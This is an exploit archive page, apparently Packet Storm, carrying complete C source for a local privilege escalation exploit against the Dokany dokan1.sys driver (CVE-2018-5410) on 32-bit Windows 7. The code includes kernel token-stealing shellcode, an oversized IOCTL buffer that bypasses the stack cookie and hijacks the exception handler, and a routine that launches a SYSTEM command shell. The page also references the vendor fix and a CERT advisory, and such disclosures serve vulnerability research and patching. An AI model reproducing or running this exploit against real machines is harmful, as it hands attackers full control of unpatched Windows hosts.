what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Dokany 1.2.0.1000 Buffer Overflow / Privilege Escalation

Dokany 1.2.0.1000 Buffer Overflow / Privilege Escalation
Posted Jan 14, 2019
Authored by Parvez Anwar

Dokany version 1.2.0.1000 suffers from buffer overflow and privilege escalation vulnerabilities.

tags | exploit, overflow, vulnerability
advisories | CVE-2018-5410
SHA-256 | 4cec54150e83733ee365b015529c4d432dc43bb01ce8a5e7c39183d5d8c98f09

Dokany 1.2.0.1000 Buffer Overflow / Privilege Escalation

Change Mirror Download
/*

Exploit Title - Dokany Stack-based Buffer Overflow Privilege Escalation
Date - 14th January 2019
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://dokan-dev.github.io
Tested Version - 1.2.0.1000
Driver Version - 1.2.0.1000 - dokan1.sys
Software package - https://github.com/dokan-dev/dokany/releases/download/v1.2.0.1000/DokanSetupDbg_redist.exe
Tested on OS - 32bit Windows 7
CVE ID - CVE-2018-5410
Vendor fix url - https://github.com/dokan-dev/dokany/releases/tag/v1.2.1.1000
CERT/CC Vul note - https://www.kb.cert.org/vuls/id/741315
Fixed Version - 1.2.1.1000
Fixed driver ver - 1.2.1.1000



Check blogpost for details:

https://www.greyhathacker.net/?p=1041

*/


#include <stdio.h>
#include <windows.h>

#define BUFSIZE 896


// Windows 7 SP1

#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct


BYTE token_steal_w7[] =
{
0x60, // pushad Saves all registers
0x64,0xA1,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax Current _EPROCESS structure
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x89,0x91,0xF8,0x00,0x00,0x00, // mov [ecx+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x61, // popad Restores all registers
0x81,0xc4,0x3c,0x0b,0x00,0x00, // add esp,0xB3c Target frame to return
0x31,0xc0, // xor eax,eax NTSTATUS -> STATUS_SUCCESS
0x5d, // pop ebp Restore saved EBP
0xc2,0x08,0x00 // ret 8 Return cleanly
};



int spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;


ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);

if (!CreateProcess(NULL, "C:\\Windows\\System32\\cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return -1;
}

CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);

return 0;
}



int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
BYTE *inbuffer;
LPVOID addrtoshell;


printf("-------------------------------------------------------------------------------\n");
printf(" Dokany (dokan1.sys) Stack-based Buffer Overflow Cookie Bypass EoP Exploit \n");
printf(" Tested on 32bit Windows 7 \n");
printf("-------------------------------------------------------------------------------\n");

addrtoshell = VirtualAlloc(NULL, 1024, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if(addrtoshell == NULL)
{
printf("\n[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}

memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7));

printf("\n[i] Size of shellcode %d bytes", sizeof(token_steal_w7));
printf("\n[i] Shellcode located at address 0x%p", addrtoshell);

inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

if(inbuffer == NULL)
{
printf("\n[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}

memset(inbuffer, 0x41, BUFSIZE);
printf("\n[i] Buffer located at address 0x%p", inbuffer);

printf("\n[i] Size of total input buffer being sent %d bytes", BUFSIZE);

*(WORD*)(inbuffer) = BUFSIZE; // Size of buffer used by memcpy
*(WORD*)(inbuffer + 2) = BUFSIZE-6; // Size of input buffer, value has to be at most BUFSIZE - 6
*(DWORD*)(inbuffer + 776) = 0x42424242; // cookie
*(DWORD*)(inbuffer + 784) = 0x43434343; // return
*(DWORD*)(inbuffer + 792) = 0x44444444; // IRP
// *(DWORD*)(inbuffer + 892) = 0x45454545; // Exception handler
*(DWORD*)(inbuffer + 892) = (ULONG)addrtoshell; // Shellcode

sprintf(devhandle, "\\\\.\\%s", "Dokan_1");

hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);

if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}

printf("\n[~] Press any key to continue . . .\n");
getch();

DeviceIoControl(hDevice, 0x00222010, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);

printf("[*] Spawning SYSTEM Shell\n");
spawnShell();

CloseHandle(hDevice);
return 0;
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close